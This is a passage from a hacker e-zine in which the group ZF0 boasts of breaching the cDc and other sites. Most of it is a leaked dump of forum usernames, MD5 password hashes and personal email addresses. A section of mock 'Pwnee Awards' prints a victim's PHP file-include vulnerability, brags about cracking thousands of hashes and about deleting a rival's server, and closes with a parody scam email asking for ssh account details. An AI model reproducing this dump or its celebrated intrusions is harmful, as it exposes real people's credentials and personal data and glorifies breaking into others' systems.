bwd1974@netspace.net.au -elreaver 8cc2b870005b049000fc6edae10f1311 elreaver@xantius.com -jfizzle1234 b04d69c159c0c530ff1185dd9c5e67a5 jfizzle1234@gmail.com -G4mer 040b7cf4a55014e185813e0644502ea9 genmail@bluebottle.com -caesar2k 892b738f031147043fc4c7dcd81010e3 caesar2k@gmail.com -oz_006 8a3fb6ec24d64806fe20d1f8071e0183 baron_006@hotmail.com -lwtreerist 0d09ba8d8e07b1373f5b757e8c39265d lw_treerist@yahoo.com.cn -mimsbro fb1734f919984f5beb557323ab838424 mimsbro@gmail.com -Lubosh e10adc3949ba59abbe56e057f20f883e Lubhoz@gmail.com -mzer0 e10adc3949ba59abbe56e057f20f883e xhteam@gmail.com -Bryza be944712da2d4ac35195d9ae2a8a5401 egcpj@ukonline.co.uk -minadesu 5f4dcc3b5aa765d61d8327deb882cf99 minadesuchan@hotmail.com -kumarancs 886f6803b74dc5e0a9a96fa11090277b lordreturns@yahoo.com -Sacki 79c075880be456508e77569d90bf0806 jack_nurminen@yahoo.com -SnappedManX6 858909c44b12eac8b543e51730f2e4f7 SnappedManX6@hotmail.com -TotallyNaked dc08c39e669ed03db179f83b5df6ef3d dysfunctionx@lycos.com -terminal.bliss 20b985ba91f9e8d150b8fcfd4372c07d terminal.bliss@gmail.com -jony1977 ca1871726e4d487b064d0a0fb2842223 jony_1977@hotmail.com -havokish 1a68a5672b770bd4693e59d7176f89b2 havokish@gmail.com 0 -Koriar daf63b42c52e76ac9f1a1c7eb26b1ae3 koriar146@yahoo.com -phantom784 e79aca87d0a49fe2b90486c3b9ee7d8a phantom784@gmail.com -karthike 909547a318ebdad0e27e1d4b0420cd1a karthikep@gmail.com -WK d25ae3a84533b6c29bd5091a3f85e5ab wk99@spambob.net -CyberMan00 73bb6569ce2370e1992cf378e6138b13 lyngstad1978@hotmail.com -Billybob 6f5ce509409309955069e71990502319 matthew2003@tiscali.co.uk -nebajoth 33cd2e4c32f19edb3a75bdbb1c3ec72e nebajoth@gmail.com -phyxa 14854f02615b6b1f5571b2fd28800223 kmbxx@tiscali.es -jamiecollinson 1c138fd52ddd771388a5b4c410a9603a jamiecollinson@gmail.com -withawhat 2bacbb0d0f5b89c2a107f9882ccabd05 withawhat@hotmail.co.uk -bit2 0edfd5bd129fcfa8dc6c9607d04780b7 banmono@gmail.com -zanetusken b9dba0afdc84c574345d304a161c7830 zanetusken@hotmail.com -bhattabdul 7634dbcaad8c1e35cde5b33ed7201e89 bhatti_abdul@hotmail.com -Yggdrasill a272ec479b693108f946c0c4320ccf4a promike@hotmail.fr -TinyTim 7f0957b2c3a24e271a4fe708152657ed mt567432@aol.com -gooooooogly 1ad9a08f3507302aa8964e5245683ca3 gooooooogly@gmail.com -THER 9cb9d35d7b754c22b46513f79852ca2a robert.kettler@web.de -vipzen ffe553694f5096471590343432359e02 vipzen@gmail.com -IronJan 23c9d0b4079bfd35b26dc539aa129cb0 empereordrake@yahoo.de -controversial1 12cd8215b8b7d0cea5d4d22180862cfc controversialcrystal@hotmail.co.uk -TechnoMan d804898571893c3939a9736b16efda3e sparsh007@gmail.com -miraj 87407e3d60d386ec1d1d35ccd8e8edce asli228@gmail.com -waldo77 e67c10a4c8fbfc0c400e047bb9a056a1 aaronchung@gmail.com -smir86 5583413443164b56500def9a533c7c70 monstar1986@web.de -bloodwraith 76c86ae61eb5f7bd79c14f79ab015112 bwraith@gmail.com -alnovepo 76c7006c810c713a933b64ce2a4a9af1 juni7d2@yahoo.es -michaeless 4310bc7480e027b4b5aede530e4ee9df michael.w.essary@us.army.mil -lilbo19 622dbd625cd6d83405e041d935507964 gabewells1a@aol.com -Michael Yardley 1cd87f5976c0893cb50d0758f528963f yardleymj@yahoo.ca -km559739 a4738967a068115323a8f54db6592cff km559739@yahoo.com -jkbo2k 7a04dfdb459cc8b8ace207bfaa6ce50d jokex@163.com -qoisone 691f4ee0a8ee19ac4107d7ffac727402 qoisone@gmail.com -metalliman e32a3e8895594576cff8307198738027 sosnowski127@hotmail.com -pencilbox d488f9441babe51c8ffbe2b456e22d68 pencilbox@amerika-wow.com -TomRipley 4afd5a0812c0504c3c89c3c560b5538f tomripley2007@yahoo.com -Tesla 3c962bf49ebcc09d09927933ba8bf3f7 admin@mogens.no -Law&Chaos 2a26774f0351eb105625377421412e4b thomas@emdx.org -mconner27 1e46fddc42b2075312d8918a51e00192 conner27@gmail.com -steph 67066022e92b394f09093ffc5c80fa9f steve@ltbg.latech.edu -eeasee 670da91be64127c92faac35c8300e814 emac3@asheville.com -rain357 e10adc3949ba59abbe56e057f20f883e rain357@gmail.com -crazy_ray87 3413126057bbe3d4f6ec0718fc033da9 ryknights@hotmail.com -SavageAir d212399f93f098d315184dbc0c3a5184 savage@savageair.net -justcurious 0945fc9611f55fd0e183fb8b044f1afe justcurious@freemail.gr -aws a5df375d7c972248177e8b4407c8808c spamscanner@gmail.com -yoko 131996a948c1bc1044791eb7487acdbb yoko_mcperez@mail15.com -mvanes01 400eec92094fcddfeac1761c785deb37 michaelvanes01@hotmail.com -cwhitti b3f952d5d9adea6f63bee9d4c6fceeaa cwhittiker@hotmail.com -conner27 1e46fddc42b2075312d8918a51e00192 mconner1@hfhs.org -smallz12 f2fea873c2923c711407293737c68a6f zackparadise@paradise-electric.com -uzmanager be4697cd969004ac362801e97e9a56cb uzmanager@gmail.com -billygoat71 d63e0eaa4c7603133083eac9b558c33d captainamer71@gmail.com -Fallen 38b5c9709668103bdf3e207a76d0b9cd squall.devil@libero.it -boredkiwiguy 8d70e0d1acb06b4648c7aa8927509660 stonemethod@hotmail.com -anarcotik 5c8454580d3b2e221eb50115c70711ce zevyvuwyfolifabu@tempomail.fr -Rorwooken 7dcd56dd7d26058acfbdfd0258b654a9 napoleonicsoup@gmail.com -geba 38454f6f808076a4d7cd8cb2c0f49cba gbwlls@aol.com -jki 045682c67b4b69ffa5e3bdc6f77bf999 jeffreykim87@gmail.com -xxstaggyxx b5f0683e77a2982a42b3ed1d639b7e89 raindown89@hotmail.co.uk -KLEY 962012d09b8170d912f0669f6d7d9d07 KLEY5@yandex.ru -drefts 70b76e485a07f4476e690a5093685b06 komplett_idiot@hotmail.com -MikeKnight d5bd80ffdaf33336cf2756f58403976e usenot@hotmail.com -luckynyk 9686f22ad7125e39b9acf0a14150c9bb nyk325i@gmail.com -anthonimatic 87e897e3b54a405da144968b2ca19b45 anthonimatic1@yahoo.com -Delamater 76419c58730d9f35de7ac538c2fd6737 greasemanjack@yahoo.com -wkid cbbcb1ffb2d8dce184a04b0ac13cd366 bagpiper.88@gmail.com -kusss a03e2e1002692b467e1220281d915f0e beyondtheshadow@hotmail.com -amacfie ae9df8722138865ffc98ee26a3868d01 broon_pa@hotmail.com -COA4715 808c678dcb3006d705f8b564b1ef462d gordonh@xtra.co.nz -jawbreakerd4 8eea6534baee3e9227ad4914348c24d5 hugthedolphins@sbcglobal.net -stealth350 edf2c70035f55af16951e43a79c4f3be spamman6969@hotmail.com -swaprom 1bb1d0bb815d9167e283cfb362f87257 romil.bhalla@gmail.com -dawn 2c9950884875a5a8364d0ca422e8f041 danieladevivo@hotmail.com -Twang e99b990aaa3ee94d2f222df8c14dc709 drunk@geocities.com -Markus24NRW 2c1743a391305fbf367df8e4f069f9f9 bogus_@gmx.de -hellrisen af97a13817b647646b325d629d32c8aa tomtom22342007@gmail.com -philskillz 316e16bf64c9633b67265740cda5c659 philskillz@yahoo.com -driekes 86a3569a56d8990b41e53c88c37b4689 driekes@skynet.be -lord_mendel 03e0a20d32472d426558c27a28339e44 lord_mendel@hotmail.com -deader5000 df39ff03bc2ccf01ac2a03e8e045e558 deader5000@yahoo.com -potmstun ecb97ffafc1798cd2f67fcbc37226761 taurenstomp@gmail.com -j368 9c28b1d790af0a58491162e7383cd817 justin368@gmail.com -shreaker c15ed73466b849796e103ae8fbd8e458 shreaker.figa@gmx.net -nghtcrft fe9e1b90ba44d01aa88ba5a0b4aa911c nghtcrft69@yahoo.com -Dogfish 818bf5365e1de87fea175bda652162b3 pierre8977@gmail.com -tjarde 70f4a46b01032d6097e003b01a9418e9 tjarde01@hotmail.com -Pernat1y 24ecb6c5567340e4b7bc0e54786d1841 aov2003@ukr.net -loup b317be3462a839f7801a8833b7c2091a werewolf21@gmail.com -shahata5 f1a81d782dea6a19bdca383bffe68452 shahar.talmi@gmail.com -bhill768 aa42f3e2f3f3119e2706f6a10f544aef bhill768@yahoo.com -darkkosmos 144274f4516821d3ed521bd814ad872e darkkosmos@gmail.com -anthonyyyg 6b154c646b830ac8a103e723c77e1c46 anthonygrazian@gmail.com -NeoHakai 89f10a9e1dec531ee8acb5bbb69bc4e7 NeoHakai@gmail.com -fritzthebeast 7cc277cfc93b814a898ffaa31d4710ab likewize99@gmail.com -kalidomra 23c53d91b6cc1b4aa0494802a0b68781 kalidomra@hotmail.com -jakeishere 4297f44b13955235245b2497399d7a93 cjastudios@gmail.com -Saudi c8291b75e9731c55bb8c6628bf7cad9f ghu@hotmail.com -Jfave e77dfef156e22e4b4ad6daa3958b3f50 jaf2001@hotmail.com -thesaxman 64bd4c4cb7528fcae0f11cae03ba590b sylvainarseneau@hotmail.com -drate 29f26d37ae1c5a5f618c2e904d174456 mike@drate.com -chgoarea 3d4d5970d817b41ea474298f62854e42 garysgerage@gmail.com -nomojob e2ef007c4f768aeda217311fd39ba4e5 freedomcentral@fuse.net -spexc31 038fd73a9f8eb07a57fc87e94457a7f4 spexc31@gmail.com -ali 502c7374bebefaec076e8a09117439b2 8thist@gmail.com -bekin dafcad6bec14c092ee03e4e69baf631d bekin31@aol.com -tron103 119e56693d2816c92f74e061d36739f9 tomriddler@gmail.com -richardPM 0088d3c1d7f9192767eaf7d95b2ec5f0 mclaughlin.rp@gmail.com -RedOctober 770276145378c48f76b97829e663eed3 redoctober99@hotmail.com -sideshowmel 4ae428e104c63d2e0e78b157230a9a3f kickskass@gmail.com -triglad 195f9b9fd8128a29dac773077994698f triglad@gmail.com -norin radical 839ec25f709ade9191e5531944745407 bewitchful_yan@yahoo.com -Googlecdg 1aea966eecfe54dae79e7d8092945f0e googlecdg@hotmail.com -hkuspace 25d55ad283aa400af464c76d713c07ad seeusoon@gmail.com -yama d7324e16e63c939cbcfe0da54ad580e5 yama.g.apache@gmail.com -Phiphler c5b27c06b12609778d8812389ab4439b dum_dumt@hotmail.com -bikam0wz 454b650d4e78b35310719fdb05bb077a bikam0wz@gmail.com -SuperStarJon ddde18d21f121ae41e8f49b37c18a463 howell_759@msn.com -sommer fa5952daebca77d9d552a07f09a79f23 petersommer@web.de -xfreakk faf2ca38c02c5f2ba1c49d200a03f9fb xfreakk@gmail.com -grjemo 9376a81ed6eff08f555c88bdd9ce408a grjemo@gmail.com -botnut a52a353c11ec761a5f70c853d26ba38c darkmarine.eagle01@gmail.com -Raggdoll811 9fc1386e8b680dd5052344caf9aff984 raggdoll811@aol.com -raleighburner 2cc5143f13c0f9a00a146d37b7e51aff bmxtyres@hotmail.co.uk -aplace2rest ebedb0d14385c3fb0d6ef076db69bb82 treywilson@gmail.com -pleb0cide 1d48d838f865f48ec8116ddaa3b2d4c5 clickfix@gmail.com -ARRRRR! 8bf425337221aaad40f496b26baa792a givemehead_19@hotmail.com -hobbit bd9580aa804a8af86c0d55bb59a867c2 email@danthony.co.uk -assassin a9448baf7ff29d45f8daeefb1cb953aa assassinrow@live.com -ustim b2ace2a3addadb4211256365427d69a9 ustims@gmail.com -ralos 7b4f0098f52c78647be2bc5dd6e10d08 alesri@hotmail.com -100kg 25f9e794323b453885f5181f1b624d0b metal4brozerz@yahoo.com -ion 4a548addbfb239bbd12f5afe11a4b6dc ak@akpro.net -joniesan dff7cd7a0f4ecc53b25b8042eedde5c5 johniechong@gmail.com -storm03 682ceae6fd02b6019475c9db2a183c60 0ptimus_prime@gmx.de -hjort-r 6e48ca4c69e3d00b5b8fbbd06f6985f4 rasmushjort8@msn.com -Destradix 23b53849ac09d1a1e6f05613ac45a42d DemorianCale@gmail.com -pelister 1327b27ae2d4069a820bcc5071fb4c55 ckembar1972@gmail.com -pionext a32bced88c7008f60b93432ea571763d pionext@gmail.com -fos e5b3a58bac579a03566e69a8a8d04d4a castrumargenti@hotmail.it -restif c1d5b24f99ea1051afcbd9f0154a543b sonderkommando@o2.pl -wiking 49d2503cabac0686951637454186171f panzerfaust80@hotmail.com -tonyz 3021d2a32bc9b897039aab8d741ac1cb boriszizic@net.hr -sandman233 7a6e614ec17bce4f0238ef1803569094 philipwaterspryce@gmail.com -wenjintao 4297f44b13955235245b2497399d7a93 xili22@gmail.com -hkopgood 5cd381d39aac81296d1a5aac1cf07ea1 hkopgood2@gmail.com -Daldom b44b82d0105c84e2feb7c6cae1508c3f Dominicanctil@msn.com -Chris 944facfeb153b4f01916a0f166fcc315 crs.s@gmx.net -joes 76feb9047cda4b67caef7e7bdbb6b4d0 simanis@ecs.umass.edu -Crazy b8bd415b96ff7b0592d30e95a2b0a0cd jake.shaw@hotmail.com -mycologist 7a85baabb14687ef170c5a84039f76a4 sharplight@gmail.com -jmesmon ce5225d01c39d2567bc229501d9e610d jmesmon@gmail.com -Recesscrash a4a3e3662bd0008d086b982768c4e5b9 jamericanboy7941@gmail.com -Constantine b05e02d26b524e4287428984d14a6824 kostia.izotov@gmail.com -curiosity81 ba018160fc26e0cc2e929b8e071f052d steven.p.wright@gmail.com -litebox bb80b2dcdfbbf078aabf49e7253ed25b pablohumberto@gmail.com -gena 51cbb1c0757de2a559396bb55180ed3a kdantsin@ptd.net -huhh 9cb51b2a6ac4724aa7e12f91f2775454 huhh@shaw.ca -katana 8ceb924fa49fc813f25fcd61ab579935 shanernewman@hotmail.com -srd e2f3a4883a4c8781ac124b5ea11fc573 sordo.co.nr@gmail.com -roncarlston22 d3026390ef1ea69288138c49d6327cfb mrmikemandt@yahoo.com -benike 827ccb0eea8a706c4c34a16891f84e7b hazmy1994@gmail.com -peiying31 7c4e950b5bc7c683ab6812707379b642 peiying31@hotmail.com -dragonouv 696fbf17aefa357b0a62a92a87e8652e katanadcp@yahoo.com -Ichan c57c9baef7cf01daa3aeed7ed5a592ad technofreak23@hotmail.com -elle-bella b11e2a67f009c0a7173a89bd440cebca elle-bella@hotmail.com -dirtydsanchez 39f13d60b3f6fbe0ba1636b0a9283c50 dirty_d_sanchez@yahoo.com -romelo 82cd7f755ce86ca71885967c75083bea romelo@net.hr -TOMBRADY 7c6a180b36896a0a8c02787eeafb0e4c tom@spam.la -mohammed 9b7148bf61baaf1128fc3226a1752ed3 a_m1956@hotmail.com -loloko b2e5ef3e4af2bac2a05ef5c7c00f2a34 loloko3@hotmail.com -sexsmurf 3d6c68e00151c9284c3e344cbb9886b2 smurfsangiloilo@yahoo.com -ignotus e422d8c86b036c44ab1c1e7cfc0d4f97 erobish@yahoo.com -Apotheosis 3d89c820079990509a02104a0bc1196f swingtradeit@gmail.com -Ag4r 3d78a82b018ee223c1fecdfbaf4979fe agaryulnaer@hotmail.com -chilsung 73f2b9ad80693506f5fc6b1fd505b2e3 zanmato_blade@hotmail.com -harveyheckler 09b033b1aa58ba9535b900bdd47da316 ronfra@travel-net.com -hamburglar e511145ba1e0ea2e8c21a0a13ba2c853 kollinbrandenburg@yahoo.com -remz ea58881c7c420d82c44a2bb1db77c4ae elmarae1989@hotmail.com -00kuroro00 e10adc3949ba59abbe56e057f20f883e cau_ut_dep_trai@yahoo.com -tome a4b46da106e59f424a2310cb7766366e tome@mailinator.com -mike6426 a3fa9e0b6b24b1cada4b756c0d240444 miketyler@roadrunner.com -x_h0rr0r_x dce69de4c279a4257289e14fc536dfa6 d0lla@msn.com -d0lla dce69de4c279a4257289e14fc536dfa6 candy_hot45@yahoo.com -mattdamon a883241dd51bda403ae5d9eb14e41331 nickmyszkowski777@hotmail.com -sadelphi 55588b38933450f80d76761f59c75626 sadelphi@gmail.com -joffa 0fe073ab8214a666258e3e51e267af03 joffa5555@yahoo.com.au -errata 8a80647f22cc26c41c05797c7126e252 micheldegeofroy@gmail.com -Hacktivist 84b6bff75d2fccfa0be3d8b948899ed1 raymond11h@sbcglobal.net -saguy 831dd9a4ff236903b0635228b219ea82 dfoxon@sc.rr.com -molina21 bd2c1c666a5f5aeaa9ad9a2228157c0d molinagomes121092@hotmail.com -Sirio 6e6a9ad2b2a4a4bca942177fbf3bd1fd siriothelord@hotmail.com -jaysscholar eb88614caf3b766ed80eb95ade06a868 jaysscholar@gmail.com -halloffame 127c6a283b803a6888c6abab4e3c990b halloffame88@yahoo.com -EliteBattleman 416a872750a9cb239d638718da48952b EliteBattleman@gmail.com -rolyeguez d591713ae011a0c068e7e41e67090134 rolyeguez@hotmail.com -b02k31337 1b6d47df5dd084b34acb0421254c3559 mattsaff@dsl.pipex.com -Tassy e15e8305ba59075d89ab25d83823358e tashizex7@gmail.com -shooter11 c5fe25896e49ddfe996db7508cf00534 shooter11@everymail.net -rohdus 2e78dda59ee83ab00cd22bee344ef3a6 rohdus@yahoo.com -deamos 0ac0c4accdc5b0b0469806e9be381be1 cutthiscutthat@hotmail.com -newman d482aa034eb68d0630270db1a376a0e2 newman@me.by -Craftuser 057b3b95df64e1680da1259ce1fb9b45 craftuser@hotmail.com -bekoz 574bf934c801603f9f128139d9c75c85 imbekoz@yahoo.com -Snpdo 5ada5946feba299ba4020a0410c93f3c snpdo@live.com -repeekyrots 6eeb96b97131a28cac993ca246477ac7 repeekyrots@excite.com -ironjrackham ecd729e1e507d6b9593a8330d4ad0795 ironjrackham@yahoo.com -kostriak1 bed77bf881c52caf14da5d0b9cd84bc8 kostriak1@pobox.sk -gwyn31 cb205edee16b24366c871cf55e781346 robotics123456789@hotmail.com -Chrono Clock d0f36b76d650a598455aaa62102f16fa setzer_45@hotmail.com -judas 7ec8163d877c1fb0eb83e8db515ab0a0 judasaddiction@yahoo.com -nhamvidan 80624718ead20144dab3116e53e54932 nhamvidan@yahoo.com -dlee ca6d3bc908fb11928cec1fa4fdbfe50b donald.li@3dsp.com.cn -gwyn c524ed2dab8f2edfe1cc34528df0e9c2 robotics12345678@hotmail.com -crfog 5badcaf789d3d1d09794d8f021f40f0e f14_tomcat31@hotmail.com -deliciousk fcc82593b06931d8c1aa15c1dd7dbab9 martin@deliriumservers.com -JackCarlos 3792405c4101502fdd0be7f548818d46 prince_dain@hotmail.com -silentmyst 81ccb67b3ecce8bbd4c38165af29eda9 wgswashbuckler@Yahoo.com -Titaneous 6538f2edf1e42690f111f871be7e7464 Titaneous@gmail.com -lgp802a 727ea5586da5a8fb76cc7b12e01895cc lgp802a@21cn.com -GameOver d22157676066a47c49584db544192aa5 solarismka@hotmail.com -Florentino 6aecdfe8b004d1e8cb1e42c4414687a9 cn8ok@yahoo.com -Marlark 1e20f72184e82e0f5ffce621a1cc6d10 pandascansurf@gmail.com -majejo ff8065fc1c559d715ba2dc7ea7359945 ordthekingpin@gmail.com -finalta 677b724e54004173026c13a754ff591e g0yanx@yahoo.com - - - - - -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - .-. _ _ .-. - / \ .-. ((___)) .-. / \ - /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ --/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- -/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ - \ / `-' (U) `-' \ / - `-' `-' -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - - - -God damn that all felt so good. We pwned cultdeadcow.com, ninjastrikeforce.com/ -robohara.com, oxblood.net, hacktivismo.com, bo2k.com, comradesmack.com, dildog's -life... That's a lot of stuff! Stopping was optional, there's no end! - -cdc has some interesting people and some who are technically inclined. But that's -the thing, interesting *people*, not interesting *hackers*. That is only a -problem because they tell the world that they are leading hackers, when they do -not even qualify. At best they had a couple of people in the mid-90s, and now a -couple of people who joined cdc but whose tech interests are entirely unrelated. -Any hacking going on is not going on in cdc; cdc is just a banner organisation -that they can all use to add another line to their About pages. - -They need to fuck off with this hacker stuff. Just drop it. Drop oxblood because -he is only around to be the media man. Just settle for being a community of -friends, and resist the temptation to tell people that cdc is a hacking group. -It's just a big scam, a big lie - gobbles said it in 2002 and we are saying it -now. You have defined your organisation around the concept of misleading people -who are not in a position to know better. - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Pwnee Awards zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -The Pwnee Awards are a whenever-we-want underground ceremony celebrating feats in -being pwned. We (ZF0) are the pwners, the winners are pwnees. This is our little -review of the zine, a winding down as we end. - - -============================================================================= -== Most Blatant Security Hole =============================================== -======================================================= Winner: Rob O'Hara == -============================================================================= - -<?php -if (isset($_GET['file'])) { -$file = $_GET['file']; -$page = $file . '.txt'; - $picture = $file . '.jpg'; ##### This also loads a picture of the -same file name. Handy, but not here. - if (file_exists($picture)) - { echo "<img src=\"" . $picture . "\" align=\"right\">"; - require_once "$page"; } - else - { - require_once "$page"; - }} -else { -$page = 'index.txt'; -require_once "$page"; -} -?> - -The above code is a textbook file include vulnerability. One little catch -though, remote files were disabled, so we had to use fun tricks to own the -box. Those tricks are Copyright ZF0 2008, we'll license them for the right -price! Seriously though, that's a really bad vuln. It's obvious, easy to -find (completely outer layer), and easy to exploit. - - -============================================================================= -== Most Thoroughly Refuted Whitehat Security Product ======================== -=============================================== Winner: Comodo HackerProof == -============================================================================= - -Not much to say on this except that HackerProof does not do much for you, -and that the naming is complete misrepresentation meant to separate fools -and their money. - -Not much point, unfortunately, since anyone reading this already knew that. - - -============================================================================= -== Most Hashes Cracked ====================================================== -======================================================= Winner: Blackcode == -============================================================================= - -We actually cracked something over 4,000 of the nearly 10,000 blackcode -hashes. We have invented a Noob Index. It works like this: you take the -percent of hashes cracked, and double it. That's how juvenile the -community is. Gives BC over a 80 score, the highest in this zine. - -There have been a lot of complaints about us dropping hashes, and about -the length of our zine. So we just saved all those for ourselves and gave -you the mod passwords, motherfuckers. You can beg us for passes if you need -them! - - -============================================================================= -== So Annoying We Couldn't Stop Ourselves From Publishing Their Lame Asses == -=================================================== Winner: Triviasecurity == -============================================================================= - -That basically says it all right there. They are the least notable hack in -this zine but someone just got too annoyed at them. - - -============================================================================= -== Most Outrageous RM ======================================================= -============================================================ Winner: g00ns == -============================================================================= - -Everything from DDoSing their server, to mass confusion about who did the rm, -to g00ns members trolling, quitting, lecturing, complaining, and probably -crying, it was just a good time watching. - - -====================== Until next time, stay safe! ========================== - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 On our way out zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - -(THIS IS STRICTLY CONFIDENTIAL - OWNER OF SHELL BOX ONLY) - -COMPLIMENTS OF THE SEASON - -Good Day! - -I am a internet hacker from the group ZF0. I am writing you this email to ask -for your support and co-operation to carry out this transaction. We have -discovered some abandoned warez that includes, g00ns IRC logs dating back -months, full g00ns hack logs and misc Wordpress databases, on a random computer -somewhere in Italy. We believe the box belonged to a deceased internet hacker. -We have made every attempt to contact next-of-kin but none have been -forthcoming. - -We have now decided to look for a trusted partner to apply a claim to this -data. The problem is we need a foreign computer to house this data as we cannot -afford to maintain the deceased internet connection - it must be foreign as we -do not wish the data to fall into the hands of computer forensics agents. We -see that as e-walking on someones grave. - -If you are willing to help us, please confirm via contacting us on the email -address below. Please send your Full name, IP address, domains you own and most -importantly valid ssh account details to allow us to transport the data via the -secure protocol (We do not want government agencies to wiretap and steal the -data in transit). - -You are most kind good sir - -Sincerly, -Giovanni Balechi -EMAIL: superheroes@hushmail.com - - -~~~~~~~~~~~~~~~~~~~~~~~~~~ Hope you enjoyed the show ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~ ~~~~~~~~~ -~~~~~~ Bye Bye ~~~~~~ -~~~ ~~~ |